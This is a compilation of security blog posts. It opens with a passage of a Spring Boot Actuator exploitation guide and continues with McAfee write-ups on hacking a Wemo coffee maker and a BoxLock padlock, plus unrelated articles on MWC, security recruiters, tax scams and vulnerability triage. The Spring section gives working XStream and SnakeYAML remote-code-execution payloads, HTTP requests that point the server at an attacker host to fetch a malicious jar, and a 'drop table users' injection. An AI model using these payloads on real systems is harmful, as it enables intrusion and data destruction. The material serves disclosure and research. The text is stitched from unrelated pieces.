Content-Type: application/x-www-form-urlencoded
Content-Length: 65
 
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

This property modifies the Eureka serviceURL to an arbitrary value. Eureka Server is normally used as a discovery server, and almost all Spring Cloud applications register at it and send status updates to it. If you are lucky to have Eureka-Client <1.8.7 in the target classpath (it is normally included in Spring Cloud Netflix), you can exploit the XStream deserialization vulnerability in it. All you need to do is to set the 'eureka.client.serviceUrl.defaultZone' property to your server URL ( http://artsploit.com/n/xstream) via '/env' and then call '/refresh' endpoint. After that, your server should serve the XStream payload with the following content:

<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                      <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>

This XStream payload is a slightly modified version of the ImageIO JDK-only gadget chain from the Marshalsec research. The only difference here is using LinkedHashSet to trigger the 'jdk.nashorn.internal.objects.NativeString.hashCode()' method. The original payload leverages java.lang.Map to achieve the same behaviour, but Eureka's XStream configuration has a custom converter for maps which makes it unusable. The payload above does not use Maps at all and can be used to achieve Remote Code Execution without additional constraints.

Using Spring Actuators, you can actually exploit this vulnerability even if you don't have access to an internal Eureka server; you only need an "/env" endpoint available.

Other useful settings:

spring.datasource.tomcat.validationQuery=drop+table+users - allows you to specify any SQL query, and it will be automatically executed against the current database. It could be any statement, including insert, update, or delete.

spring.datasource.tomcat.url=jdbc:hsqldb:https://localhost:3002/xdb - allows you to modify the current JDBC connection string.

The last one looks great, but the problem is when the application running the database connection is already established, just updating the JDBC string does not have any effect. Hopefully, there is another property that may help us in this case:

spring.datasource.tomcat.max-active=777

The trick we can use here is to increase the number of simultaneous connections to the database. So, we can change the JDBC connection string, increase the number of connections, and after that send many requests to the application to simulate heavy load. Under the load, the application will create a new database connection with the updated malicious JDBC string. I tested this technique locally agains Mysql and it works like a charm.

Apart from that, there are other properties that look interesting, but, in practice, are not really useful:

spring.datasource.url - database connection string (used only for the first connection)

spring.datasource.jndiName - databases JNDI string (used only for the first connection)

spring.datasource.tomcat.dataSourceJNDI - databases JNDI string (not used at all)

spring.cloud.config.uri=http://artsploit.com/ - spring cloud config url (does not have any effect after app start, only the initial values are used.)

These properties do not have any effect unless the '/restart' endpoint is called. This endpoint restarts all ApplicationContext but its disabled by default.

There are a lot of other interesting properties, but most of them do not take immediate effect after change.

N.B. In Spring Boot 2x, the request format for modifying properties via the '/env' endpoint is slightly different (it uses json format instead), but the idea is the same.

An example of the vulnerable app:

If you want to test this vulnerability locally, I created a simple Spring Boot application on my Github page. All payloads should work there, except for database settings (unless you configure it).

Black box discovery:

A full list of default actuators may be found here: https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt. Keep in mind that application developers can create their own endpoints using @Endpoint annotation.

Update May 2019:

There is a more reliable way to achieve RCE via a Spring environmental properties modification:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
 
spring.cloud.bootstrap.location=http://artsploit.com/yaml-payload.yml

This request modifies the 'spring.cloud.bootstrap.location' property, which is used to load external config and parse it in YAML format. To make this happen, we also need to call the '/refresh' endpoint.

POST /refresh HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

When the YAML config is fetched from the remote server, it is parsed with the SnakeYAML library, which is also susceptible to deserialization attacks. The payload (yaml-payload.yml) may be generated by using the aforementioned Marshalsec research :

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
  ]]
]

Deserialization of this file triggers execution of the ScriptEngineManager's constructor with the supplied URLClassLoader. In a nutshell, it leads to the 'java.util.ServiceLoader#load(java.lang.Class<S>, java.lang.ClassLoader)' method, which tries to find all implementations of the 'ScriptEngineFactory' interface within all libraries in the classpath. Since we can add a new library via URLClassLoader, we can serve a new 'ScriptEngineFactory' with the malicious bytecode inside. In order to do so, we need to create a jar archive with the following mandatory files: yaml-payload.jar:/artsploit/AwesomeScriptEngineFactory.class should contain the actual bytecode, with the malicious payload in the constructor.

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
 
    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
            Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

yaml-payload.jar:/META-INF/services/javax.script.ScriptEngineFactory should be just a text file containing a full reference to 'artsploit.AwesomeScriptEngineFactory', so that the ServiceLoader will know where to find the class: artsploit.AwesomeScriptEngineFactory Again, this exploitation technique requires spring cloud to be in the classpath, but in comparison to Eureka's XStream payload, it works even in the latest version. You can find the complete payload in my github project: yaml-payload.

Your Smart Coffee Maker is Brewing Up Trouble

IOT devices are notoriously insecure and this claim can be backed up with a laundry list of examples. With more devices “needing” to connect to the internet, the possibility of your WiFi enabled toaster getting hacked and tweeting out your credit card number is, amazingly, no longer a joke.

With that in mind, I began to investigate the Mr. Coffee Coffee Maker with Wemo (WeMo_WW_2.00.11058.PVT-OWRT-Smart) since we had previously bought one for our research lab (and we don’t have many coffee drinkers, so I didn’t feel bad about demolishing it!). My hope was to build on previous work done by my colleague Douglas McKee (@fulmetalpackets) and his Wemo Insight smart plug exploit. Finding a similar attack vector absent in this product, I explored a unique avenue and was able to find another vulnerability.  In this post I will explore my methodology and processes in detail.

All Wemo devices have two ways of communicating with the Wemo App, remotely via the internet or locally directly to the Wemo App. Remote connectivity is only present when the remote access setting is enabled, which it is by default. To allow the Wemo device to be controlled remotely, the Wemo checks Belkin’s servers periodically for updates. This way the Wemo doesn’t need to open any ports on your network. However, if you are trying to control your Wemo devices locally, or the remote access setting is disabled, the Wemo app connects directly to the Wemo. All my research is based on local device communication with the remote access setting turned off.

To gain insight on how the coffee maker communicates with its mobile application, I first set up a local network capture on my cellphone using an application called “SSL Capture.” SSL Capture allows the user to capture traffic from mobile applications. In this case, I selected the Wemo application. With the capture running, I went through the Wemo app and initiated several standard commands to generate network traffic. By doing this, I was able to view the communication between the coffee maker and the Wemo application. One of the unique characteristics about the app is that the user is able schedule the coffee maker to brew at a specified time. I made a few schedules and saved them.

I began analyzing the network traffic between the phone application and the Mr. Coffee machine. All transmissions between the two devices were issued in plaintext, meaning no encryption was used. I also noticed that the coffee maker and the mobile app were communicating over a protocol called UPNP (Universal Plug and Play), which has preset actions called “SOAP ACTIONS.” Digging deeper into the network capture from the device, I saw the SOAP action “SetRules.” This included XML content that pertained to the “brew schedule” I had set from the mobile application.

A Mr. Coffee “brew” being scheduled.

At this point I was able to see how the Wemo mobile application handled brewing schedules. Next, I wanted to see if the coffee maker performed any sort of validation of these schedules so I went back into the mobile application and disabled them all. I then copied the data and headers from the network capture and used the Linux Curl command to send the packet back to the coffee maker. I got the return header status of “200” which means “OK” in HTTP. This indicated there was no validation of the source of brewing schedules; I further verified with the mobile application and the newly scheduled brew appeared.

Curl command to send a “Brew” schedule to the Wemo Coffee maker.

Screenshot of the Curl command populating the Wemo app with a brew schedule

At this point I could change the coffee maker’s brew schedule without ever using the Wemo mobile application. To understand how the schedules were stored on the Wemo coffee maker, I decided to physically disassemble it and look at the electronics inside. Once disassembled, I saw there was a Wemo module connected to a larger PCB responsible for controlling the functions of the coffee maker. I then extracted the Wemo module from the coffee maker. This looked almost Identical to the Wemo module that was in the Wemo Insight device. I leveraged Doug’s blog on exploitation of the Wemo Insight to replicate the serial identification, firmware extraction, and root password change. After I obtained root access via the serial port on the Wemo device, I began to investigate the way in which the Wemo application is initiated from the underlying Linux Operating System. While looking through some of the most common Linux files and directories, I noticed something odd in the “crontab” file (used in Linux to execute and schedule commands).

It appeared the developers decided to take the easy route and used the Linux crontab file to schedule tasks instead of writing their own brew scheduling function. The crontab entry was the same as the scheduled brew I sent via the Wemo application (coffee-3) and executed as root. This was especially interesting; if I could add some sort of command to execute from the replayed UPNP packet, I could potentially execute my command as root over the network.

With the firmware dumped, I decided to look at the “rtng_run_rule” executable that was called in the crontab. The rtng_run_rule is a Lua script. As Lua is a scripting language, it was written in plaintext and not compiled like all the other Wemo executables. I followed the flow of execution until I noticed the rule passing parameters to a template for execution. At this point, I knew it would be useless trying to inject commands directly into the rule and instead looked at modifying the template performing the execution.

I went back to the Wemo mobile application network captures and started to dig around again. I found the application also sends the templates to the Wemo coffee maker. If I could figure out how to modify the template and still have the Wemo think it is valid, I could get arbitrary code execution.

Template with the correct syntax to pass Wemo’s verification

There were 3 templates sent over, “do,” “do_if,” and “do_unless.” Each of the templates were Lua scripts and encoded with base64. Based on this, I knew it would be trivial to insert my own code; the only remaining challenge would be the MD5 hash included at the top of the template. As it turned out, that was hardly an obstacle.

I created an MD5 hash of the base-64 decoded Lua script and the base64 encoded script separately, simply to see if one or the other matched the hash that was being sent; however, neither matched the MD5 being sent in the template. I began to think the developers used some sort of HMAC or clever way to hash the template, which would have made it much harder to upload a malicious template. Instead, I was astounded to find out that it was simply the base64 code prepended by the string “begin-base64 644 <template name>” and appended with the string “====.”

At last I had the ability to upload any template of my choice and have it pass all the Wemo’s verification steps necessary to be used by a scheduled rule.

I appended a new template called “hack” and added a block of code within the template to download and execute a shell script.

Within that shell command, I instructed the Mr. Coffee Coffee Maker with Wemo to download a cross-complied version of Netcat so I can get a reverse shell, and also added an entry to “rc.local.” This was done so that if the coffee maker was power cycled, I would have persistent access to the device after reboot, via the Netcat reverse shell.

The final aspect of this exploit was to use what I learned earlier to schedule a brew with my new “hack” template executing my shell script. I took the schedule I was able to replay earlier and modified it to have the “hack” template execute 5 minutes from the time of sending. I did have to convert the time value required into the epoch time format.

Converting time to Epoch time.

Now, I sat back and waited as the coffee maker (at my specified time delay) connected to my computer, downloaded my shell script, and ran it. I verified that I had a reverse shell and that it ran as intended, perfectly.

This vulnerability does require network access to the same network the coffee maker is on. Depending on the complexity of the user’s password, WiFi cracking can be a relatively simple task to accomplish with today’s computing power. For example, we demonstrate a quick and easy brute force dictionary attack to crack a semi-complex WPA2 password (10 characters alpha-numeric) in the demo for the Wemo Insight smart plug.  However, even a slightly more complex password, employing special characters, would exponentially increase the difficulty of a brute force attack. We contacted Belkin (who owns Wemo) on November 16th, 2018 and disclosed this issue to them. While the vendor did not respond to this report, we were pleasantly surprised to see that the latest firmware update has patched the issue. Despite a general lack of communication, we’re delighted to see the results of our research further securing home automation devices.

This vulnerability shows that not all exploits are overly complicated or require an exceptional amount of effort to pull off, if you know what to look for. This vulnerability exists solely because a few poor coding decisions were made in conjunction with a lack of input sanitation and validation. Even though this target does not contain sensitive data and is limited to your local network, it doesn’t mean malicious hackers are not targeting IOT devices like this. These devices may serve as a sought-after target as they are often overlooked from a security standpoint and can provide a simple and unmonitored foothold into your home or business network. It is very important for any consumer, when purchasing new IOT gadgets, to ask themself: “Does this really need to be connected to the internet?” In the case of a coffee maker, I’ll let you be the judge.

The post Your Smart Coffee Maker is Brewing Up Trouble appeared first on McAfee Blogs.

What’s in the Box?

2018 was another record-setting year in the continuing trend for consumer online shopping.  With an increase in technology and efficiency, and a decrease in cost and shipping time, consumers have clearly made a statement that shopping online is their preferred method.

Chart depicting growth of online, web-influenced and offline sales by year.1

In direct correlation to the growth of online shopping preferences is the increase in home delivery, and correspondingly, package theft. Though my initial instinct was to attempt to recreate YouTuber Mark Rober’s glitter bomb, I practiced restraint and instead settled on investigating an innovative product called the BoxLock (BoxLock Firmware: 94.50 or below). The BoxLock is a smart padlock that you can setup outside of your house to secure a package delivery container. It can be opened either via the mobile application (Android or iPhone) or by using the built-in barcode scanner to scan a package that is out for delivery. The intent is that delivery drivers will use the BoxLock to unlock a secure drop box and place your package safely out of reach of package thieves. The homeowner can then unlock the lock from their phone using the app to retrieve their valuable deliveries.

Since I am more of a hardware researcher, the first step I did when I got the BoxLock was to take it apart to view the internals.

With the device disassembled and the main PCB extracted, I began to look for interesting pins, mainly UART and JTAG connections. I found 5 pins below the WiFi module that I thought could be UART, but after running it through a logic analyzer I didn’t see anything that looked like communication.

The BoxLock uses a SOC (System-on-a-Chip) which contains the CPU, RAM, ROM, and flash memory all in one. However, there was still an additional flash chip which I thought was odd. I used my Exodus Intelligence hardware interface board to connect to the SPI flash chip and dump the contents.

Exodus Intelligence XI Hardware Interface Board

The flash chip was completely empty. My working theory is that this flash chip is used to store the barcodes of packages out for delivery. There could also have been in issue with my version of Flashrom, which is the software I used to dump flash. The only reason I question my version of Flashrom is because I had to compile it myself with support for the exact flash chip (FT25H04S), since it is not supported by default.

The Main SOC (ATSAMD21J18)

Even though I couldn’t get anything from that flash chip, my main target here was the SOC. On the underside of the Process Control Board (PCB), I identified two tag-connect connection ports. I identified the SWD (Serial Wire Debug) pins located on the SOC (Pin 57 and 58 on the image above) and very slowly and carefully visually traced the paths to the smaller Tag-Connect connection.

 

Adafruit Feather M0 Development board

Since I have not done much JTAG analysis before, I grabbed an Adafruit Feather M0 that we had in our lab for testing, since the Feather uses the exact same SOC and WiFi chip as the BoxLock. The Adafruit Feather has excellent documentation on how to connect to the SOC via SWD pins I traced. I used Atmel Studio to read the info off the ATSAMD21 SOC; this showed me how to read the fuses as well as dump the entire flash off the Adafruit Feather.

SWD information of the Adafruit Feather M0

Atmel Studio also will let you know if the device has the “Security Bit” enabled. When set, the security bit is used to disable all external programming and debugging interfaces, making memory extraction and analysis extremely difficult. Once the security bit is set, the only way to bypass or clear the bit is to completely erase the chip.

Showing how to set the security bit on the Adafruit Feather M0

After I felt comfortable with the Adafruit feather I connected the BoxLock to a Segger JLink and loaded up Atmel Studio. The Segger JLink is a debugging device that can be used for JTAG and SWD. I was surprised that the developers set the security bit; this is a feature often overlooked in IOT devices. However, with the goal of finding vulnerabilities, this was a roadblock. I started to look elsewhere.

Segger JLink used for SWD communication

After spending some time under the microscope, I was able to trace back the larger Tag-Connect port to the BLE (Bluetooth Low Energy) module. The BLE module also has a full SOC which could be interesting to look at, but before I began investigating the BLE chip I still had two vectors to look at first: BLE and WiFi network traffic.

BLE is different to Bluetooth. The communication between BLE devices is secured by the use of encryption, whose robustness depends on the pairing mode used and BLE allows a few different pairing modes; the least secure “Just Works ” pairing mode is what the BoxLock is using. This mode allows any device to connect to it without the pin pairing that normal Bluetooth connections are known for. This means BLE devices can be passively intercepted and are susceptible to MITM (Man in The Middle) attacks.

BLE roles are defined at the connection layer. GAP (Generic Access Profile) describes how devices identify and connect to each other. The two most important roles are the Central and Peripheral roles. Low power devices like the BoxLock follow the Peripheral role and will broadcast their presence (Advertisement). More powerful devices, such as your phone, will scan for advertising devices and connect to them (this is the Central role). The communication between the two roles is done via special commands usually targeted at a GATT (Generic Attributes) services. GATT services can be standard and generic, such as the command value 0x180F, which is the Battery Service. Standardized GATT services help devices communicate with one another without the need for custom protocols. The GATT services present on the BoxLock were all custom, which means they will be displayed as “Unknown Service” when enumerated in a Bluetooth/BLE app.  I chose Nordic’s NRF Connect, available in both the Apple and Android app stores or as a desktop application.

NRF Connect application connected to the BoxLock via BLE

Since the BoxLock was using custom GATT commands I decided to disassemble the Android APK to see if I could find any more information on the “Unknown” UUIDs. I used a tool called “dex2jar” to disassemble the Android APK and then ran the JavaScript code through JSBeautify to clean up the code.

Next, I began searching for UUIDs and the keyword “GATT”. I was able to find the entire list of GATT services and what they pertain to.

GATT services UUID descriptions

The one I was most interested in was labeled as “Command Service”, where the unlock GATT command is sent to. To try it out, I used the NRF Connect application to send a GATT “sendOpenSignal” command with an attribute value of “2”.

How the Android application sends the unlock command

It was just that simple; lo and behold, the BoxLock unlocked!

I was amazed; the phone that I used to send the GATT command over had never connected to the BoxLock before and did not have the BoxLock application installed, yet it was able to unlock the BoxLock. (The vulnerable application version is v1.25 and below).

Continuing to explore the other GATT UUIDs, I was able to read the WiFi SSID, access token, user’s email, and client ID directly off the device. I was also able to write any of these same values arbitrarily.

Information that you can see about the BoxLock via the NRF Connect application

The mandatory identifiers required for the BoxLock to unlock are the access token, user email, and client ID. If those values are not present the device will not authenticate via the cloud API and will not unlock.

The most glaring issue with having all these fields readable and writeable is that I was able to successfully replay them on the device, ultimately bypassing any authentication which led to the BoxLock unlocking.

From my testing, these values never expired and the only way I found that the device cleared the credentials necessary to authenticate was when I removed the battery from the BoxLock. The BoxLock battery is “technically” never supposed to be removed, but since I physically disassembled the lock, (which took a decent amount of effort), I was able to test this.

Even though I was able to unlock the BoxLock, I still wanted to explore one other common attack vector.  I analyzed the network traffic between the device and the internet. I quickly noticed that, apart from firmware updates, device-to-cloud traffic was properly secured with HTTPS and I could not easily get useful information from this vector.

I do not currently have an estimate of the extent of this product’s deployment, so I cannot comment on how wide the potential impact could have been if this issue had been found by a malicious party. One constraint to the attack vector is that it requires BLE, which communicates from a distance of approximately 30 or 40 feet. However, for someone looking to steal packages this would not be a challenge difficult to overcome, as the unlocking attack could be completed very quickly and easily, making the bar for exploitation simply a smart phone with Bluetooth capability. The ease and speed of the exploit could have made for an enticing target for criminals.

I want to take a moment to give some very positive feedback on this vendor. Vulnerability disclosure can be a challenging issue for any company to deal with, but BoxLock was incredibly responsive, easy to work with and immediately recognized the value that McAfee ATR had provided. Our goal is to eliminate vulnerabilities before malicious actors find them, as well as illuminate security issues to the industry so we can raise the overall standard for security. BoxLock was an excellent example of this process at work; the day after disclosing the vulnerability, they set up a meeting with us to discuss our findings, where we proposed a mitigation plan. The BoxLock team set a plan in place to patch not only the BoxLock firmware but the mobile applications as well. Within a week, the vendor created a patch for the vulnerability and updated the mobile apps to force mandatory update to the patched firmware version. We tested the firmware and app update and verified that the application properly clears credentials after use on the vulnerable firmware. We also tested the new firmware which clears the credentials even without the mobile app’s interaction.

IoT security has increasingly become a deciding factor for consumers. The process of vulnerability disclosure is an effective method to increase collaboration between vendors, manufacturers, the security community and the consumer. It is our hope that vendors move towards prioritizing security early in the product development lifecycle. We’d like to thank BoxLock for an effective end-to-end communication process, and we’re pleased to report that this significant flaw has been quickly eradicated. We welcome any questions or comments on this blog!

The post What’s in the Box? appeared first on McAfee Blogs.

Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships

We’ve touched down in Barcelona for Mobile World Congress 2019 (MWC), which is looking to stretch the limits of mobile technology with new advancements made possible by the likes of IoT and 5G. This year, we are excited to announce the unveiling of our 2019 Mobile Threat Report, our extended partnership with Samsung to protect Galaxy S10 smartphones, and our strengthened partnership with Türk Telekom to provide a security solution to protect families online.

Mobile Connectivity and the Evolving Threat Landscape

These days, it’s a rare occurrence to enter a home that isn’t utilizing smart technology. Devices like smart TVs, voice assistants, and security cameras make our lives more convenient and connected. However, as consumers adopt this technology into their everyday lives, cybercriminals find new ways to exploit these devices for malicious activity. With an evolving threat landscape, cybercriminals are shifting their tactics in response to changes in the market. As we revealed in our latest Mobile Threat Report, malicious actors look for ways to maximize their profit, primarily through gaining control of trusted IoT devices like voice assistants. There are over 25 million voice assistants in use across the globe and many of these devices are connected to other things like thermostats, door locks, and smart plugs. With this increase in connectivity, cybercriminals have more opportunities to exploit users’ devices for malicious purposes. Additionally, cybercriminals are leveraging users’ reliance on their mobile phones to mine for cryptocurrency without the device owner’s knowledge. According to our Mobile Threat Report, cybersecurity researchers found more than 600 malicious cryptocurrency apps spread across 20 different app stores. In order to protect users during this time of rapid IoT and mobile growth, we here at McAfee are pushing to deliver solutions for relevant, real-world security challenges with the help of our partners.

Growing Partnerships to Protect What Matters

Some cybersecurity challenges we are working to overcome include threats like mobile malware and unsecured Wi-Fi. This year, we’ve extended our long-standing partnership with Samsung to help secure consumers from cyberthreats on Samsung Galaxy S10 smartphones. McAfee is also supporting Samsung Secure Wi-Fi service by providing backend infrastructure to protect consumers from risky Wi-Fi. In addition to mobile, this partnership also expands to help protect Samsung smart TVs, PCs, and laptops.

We’ve also strengthened our partnership with Türk Telekom, Turkey’s largest fixed broadband ISP. Last year, we announced this partnership to deliver cross-device security protection. This year, we’re providing a security solution to help parents protect their family’s digital lives. Powered by McAfee Safe Family, Türk Telekom’s fixed and mobile broadband customers will have the option to benefit from robust parental controls. These controls will allow parents to better manage their children’s online experience and give them greater peace of mind.

We’re excited to see what’s to come for the rest of MWC, and how these announcements will help improve consumers’ digital experiences. It is our hope that by continuing to extend our relationships with technology innovators, we can help champion built-in security across devices and networks.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships appeared first on McAfee Blogs.

Best Cybersecurity Search Firms & Recruiters 2019

As cybersecurity is becoming more and more popular each day it’s also important to mention that there is a shortage of skilled people within the industry. Many recruiters create specific cybersecurity departments so they can stay competitive and fill the gap. According to the Forbes, it is expected that cybersecurity market will hit $170 billion by 2020 and cybersecurity jobs are expected to reach 6 million by the end of 2019. It’s not a secret that the rapid growth rate of the industry requires a professional approach from some of the best infosec recruiters.

In a recent interview, Karla Jobling from BeecherMadden (a top UK cybersecurity recruiter) reveals that at first cybersecurity companies wanted to hire as many people as possible. However, now they are more concentrated on how to find not many, but just the right people for the right position. It is extremely important for a recruiter to match the candidate’s expectations with the requirement and the corporate culture of the client company.

List of best cybersecurity search firms for 2019

Shield Security Recruiters

Shield Security Recruiters
A leading global recruiting firm focuses in the Cyber Security industry in USA, Europe, APAC and LATAM.
Sheild Security Recruiters have the global expertise and knowledge to bring you the quality Cyber Security candidates you deserve, expect and need.

3P&T Security Recruiting3P&T Security Recruiting

3P&T has been sucessfull in recruiting people in various areas of cybersecurity. They are one of the best cybersecurity recruiters in the area of Seattle, USA. A great UK-based company which is extremly trusted among the infosec professionals in Europe They are always ready to provide expert advices to their clients.

Alta Associates

Adeptis Group

Alta Associates is based in New Jersey, USA and performs custom searches for the most senior level executive roles in the cyber industry. They also deal with risk management, privacy, compliance and governance.

AcuminAcumin Consulting

The company is based in London, but they operate internationally with a special focus on cybersecurity and risk management recruitment.They specialize in providing key infosec and law enforcement skills across all sectors.

Blackmere ConsultingBlackmere Consulting

This company is focusing on quality, speed and cost effectiveness to provide a more specialized approach to source the best talents in cybersecurity. Their services include direct hire, consulting or hiring on a contract for a specific project.

Caliber Security PartnersCaliber Security Partners

They specialty is recruiting and staff augmentation in the short or the long term. They establish trusting relationships with their clients to identify their true neeeds of talent. Another good addition to our cybersecurity search firms list.

Computer FuturesComputer Futures

The company provides a platform both for companies to look for potential talents and for people who are looking for a career in the cybersecurity industry as well. They have a dedicated team of cyber security and business risk that provides individiual solutions.

Cyber ExecCyber Exec

Cyber Exec is headquartered in the Houston, Texas, but operates internationally also in cities like Tokyo or London for example. They definitely know how to find the best C-level employeees.

CISORecruiterCISORecruiter

As the name suggests this company are a team of professionals that will take care of your needs and provide you with the right people for your cybersec company.

Cyber Security Recruiters

This company is among the best cybersecurity search firms in the state of Minnesota, USA and is in bussiness since 2009.

Cyber 360 Inc.

Another top cybersecurity recruiters that work together with some of the biggest cybersecurity leaders and their teams to hire skilled information security professionals.

InfoSec PeopleInfosec People

The company was launched in 2008 and is currently one of the leaders on the cybersecurity recruitment companies in the UK. You can easily find a role, find people or find an advice on their website.

KnownFourKnownFour

Another UK company with owners that has been into international recruiting services for more than 20 years. Their information security department works closely with the experts to provide the perfect solution to their clients.

Redbud Cyber Security

Redbud has a national reach in the USA and is looking to source all kind of positions from Analysts or Engineers to CISOs. They are well known within the industry and can provide some of the best cyber talents.

Security Recruiter

The firm serves clients globally in the fields of information security, corporate security, risk management, governance, compliance and business intelligence.

This was our latest list of cybersecurity search firms. We hope that you will find what you need. Feel free to contact us if you want to add a company to our list.

The post Best Cybersecurity Search Firms & Recruiters 2019 appeared first on CyberDB.

Weekly Update 127

Weekly Update 127

It was another travel week so another slightly delayed weekly update, but still plenty of stuff going on all the same. Along with a private Sydney workshop earlier on, I'm talking about some free upcoming NDC meetup events in Brisbane and Melbourne and I'd love to get a great turnout for. I've just ordered 10k more HIBP stickers to last me through upcoming events so they'll be coming with me.

In other news, there was old news appearing as new news about how hosed you are if your machine is compromised with the level of hosing extending to your password manager. This will inevitably be another one of these times where something gets blown out of proportion (and context) in some of the news headlines then we'll all go back to more sane discussions about assessing relative risks, likelihoods and impacts. There's also a very stead feed of breaches making their way into HIBP after appearing for sale on dark web marketplaces so I give a bit of an update on those as well.

All that and more this week in a slightly shorter form than usual, enjoy!

Weekly Update 127
Weekly Update 127
Weekly Update 127

References

  1. Catch me in Brisbane next week at the NDC meetup (free, and very close to capacity already)
  2. Or catch me in Melbourne a couple of weeks later for the NDC meetup there (that event has just gone up so there's tickets left, but there's also strong interest)
  3. Order yourself some Have I Been Pwned stickers (and help me by using the referral code in that blog post so I can buy more to give away at events)
  4. Twilio is sponsoring my blog this week (they're talking about how easy it is to use Authy for 2FA instead of risky SMS)

Don’t Take the Bait! How to Steer Clear of Tax Time Scams

tax time scamsFor cybercriminals tax time is the most wonderful time of the year. They are in the shadows giddy, eager, and methodically setting a variety of digital traps knowing that enough taxpayers take the bait to render their efforts worthwhile.

Indeed, with the frenzy of online tax filings, personal information (and money) moving through mailboxes, and hardworking people eagerly awaiting tax refunds, crooks are perfectly positioned for big returns this year.

So let’s be wiser and let’s be ready.

Last year, the IRS noted a 60 percent spike in bogus email schemes seeking to steal money or tax information. This year its a surge in phishing scams, says the IRS, that should have taxpayers on alert.

“The holidays and tax season present great opportunities for scam artists to try stealing valuable information through fake emails,” said IRS Commissioner Chuck Rettig. “Watch your inbox for these sophisticated schemes that try to fool you into thinking they’re from the IRS or our partners in the tax community. Taking a few simple steps can protect yourself during the holiday season and at tax time.”

Scams to Look For

According to the IRS, phishing emails are circulating with subjects such as “IRS Important Notice,” “IRS Taxpayer Notice” and other iterations of that message. The fraudulent emails may demand payment with the threat of seizing the recipient’s tax refund or even jail time.

tax time scams

Attacks may also use email or malicious links to solicit tax or financial information by posing as a trustworthy organization or even a personal friend or business associate of the recipient.

While some emails may have obvious spelling errors or grammar mistakes, some scammers have gone to great lengths to piece together a victim’s personal information to gain their trust. These emails look legitimate, have an authentic tone, and are crafted to get even skeptics to compromise personal data using malicious web links.

Scams include emails with hyperlinks that take users to a fake site or PDF attachments that may download malware or viruses designed to grab sensitive information off your devices. With the right data in hand such as a social security number, crooks can file fake returns and claim your tax return, open credit cards, or run up medical bills.

Other tax scams include threatening phone calls from bogus IRS agents demanding immediate payment of past due tax bills and robocalls that leave urgent callback messages designed to scare victims into immediate payment.

Remember, the IRS will NOT:

  • Call to demand immediate payment over the phone, nor will the agency call about taxes owed without first having mailed you several bills.
  • Call or email you to verify your identity by asking for personal and financial information.tax time scams
  • Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
  • Require you to use a specific payment method for your taxes, such as a prepaid debit card.
  • Ask for credit or debit card numbers over the phone or
    e-mail.
  • Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.

How to Protect Yourself

Be hyper-aware. Never open a link or attachment from an unknown or suspicious source. In fact, approach all emails with caution even those from people you know. Scams are getting more sophisticated. According to the IRS, thieves can compromise a friend’s email address, or they may be spoofing the address with a slight change in the email text that is hard to recognize.

Reduce your digital footprint. Now is a great time to go through your social accounts and online profiles, posts, and photos and boost your family’s privacy. Edit out any personal information such as your alma mater, your address, birthdate, pet names, children’s names, or mother’s maiden name. Consider making your social profiles private and filtering your friends’ list to actual people you know.

Have a strong password strategy. Cybercrooks count on their victims using the same password for multiple accounts. Lock them out by using unique passwords for separate accounts. Also, consider using two-factor authentification that requires a security code (sent to your phone) to access your account.

Install security software. Phishing emails carry malware and viruses designed to infect your devices and grab your family’s sensitive data or even seize your computer via ransomware. Crooks aren’t messing around so neither should you. Meet fire with fire by investing in comprehensive security software to protect your devices.

If you are the victim of tax fraud or identity theft, take the proper reporting steps. If you receive any unsolicited emails claiming to be from the IRS, forward them to phishing@irs.gov  (then delete the emails).

The post Don’t Take the Bait! How to Steer Clear of Tax Time Scams appeared first on McAfee Blogs.

Why You Should Reconsider Prioritizing High Severity Vulnerabilities in Your Fix Schedule

Veracode Not all Vulnerablities are Created Equal SCA Open Source

When it comes to vulnerabilities, there is a range of severity and exploitability, which often dictates how quickly a flaw is fixed upon discovery. Most companies prioritize high severity and critical vulnerabilities, but ignore lower severity vulnerabilities. The highest severity flaws are less complicated to attack, offer more opportunity for full application compromise, and are more likely to be remotely exploitable — overall they tend to open up a wider attack blast radius.

In the State of Software Security Volume 9, we analyzed flaw persistence based on where vulnerabilities fall on our five-point severity scale, and we found that organizations hit the three quarters-closed mark about 57% sooner for high and very high severity vulnerabilities than for their less severe counterparts. In fact, our scan data indicates that low severity flaws were attended to at a significantly slower rate than the average speed of closure. It took organizations an average of 604 days to close three quarters of these weaknesses.

